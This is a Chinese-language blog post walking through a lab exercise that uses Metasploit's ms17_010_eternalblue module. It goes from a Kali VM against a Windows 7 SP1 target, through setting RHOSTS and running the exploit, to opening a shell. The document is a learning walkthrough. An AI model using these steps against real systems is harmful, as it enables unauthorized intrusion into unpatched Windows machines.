当前位置:网站首页>metasploit渗透ms7_010练习
metasploit渗透ms7_010练习
2022-07-28 05:29:00 【angleoldhen】
环境:kali2022.2vm+win7 sp1
命令:msfconsole 启动metasploit框架(也可以在菜单Exploitation Tools里点击metasploit framework)
先在框架里查找对应漏洞可用工具:search ms17_010

选用一个工具,可参考RANK列里的描述,大致有excellent、great、good、average、normal、manual等几个级别,表明该工具的攻击效果,excellent级的工具最优
use exploit/windows/smb/ms17_010_eternalblue

查看载荷参数 show options


required列里yes的都是必须设置的,有些已经填写,没填写的需要手动填写
如:set RHOSTS 192.168.107.129 //设置靶机的IP

本机IP和端口,靶机端口均已设置,无须再手打
执行命令 run

绿色【+】的行表示已执行成功
执行命令 shell

从图中可见已经成功登陆到靶机系统
边栏推荐
- Common models in software development
- ES6 add -- > object
- Technology sharing | how to simulate real use scenarios? Mock technology to help you
- Technology sharing | do you know the functions of the server interface automated testing and requests library?
- MySQL common commands
- Escape character notes
- 组管理和权限管理
- Results fill in the blanks for beer and drinks
- MOOC翁恺 C语言 第三周:判断与循环:1.判断
- Technology sharing | common proxy tools for interface testing
猜你喜欢

Method of designing test cases

Shell script - "three swordsmen" awk command

MOOC Weng Kai C language week 7: array operation: 1. array operation 2. Search 3. preliminary sorting

VNC Timed out waiting for a response from the computer

DHCP原理与配置

MOOC Weng Kai C language fourth week: further judgment and circulation: 3. Multiple branches 4. Examples of circulation 5. Common errors in judgment and circulation

Applet custom components - data, methods, and properties

DOM Foundation

Result fill in the blank (dfs*c language)

Applet navigator cannot jump (debug)
随机推荐
Array to linked list
Escape character notes
防火墙——iptables防火墙(四表五链、防火墙配置方法、匹配规则详解)
Software testing (concept)
MOOC Weng Kai C language week 3: judgment and circulation: 2. circulation
Traversal binary tree
JS string method Encyclopedia
Esxi community nvme driver update v1.1
Technology sharing | send requests using postman
DOM window related data, operations & BOM operations
Technology sharing | sending requests using curl
Servlet
MySQL common commands
NAT和PAT的原理及配置
Si Han talks about the professional development of testers
MOOC翁恺C语言第八周:指针与字符串:1.指针2.字符类型3.字符串4.字符串计算
Results fill in the blank shopping list (teach you to solve it with Excel)
Animation animation realizes the crossing (click) pause
OSI seven layer model
MySQL installation and use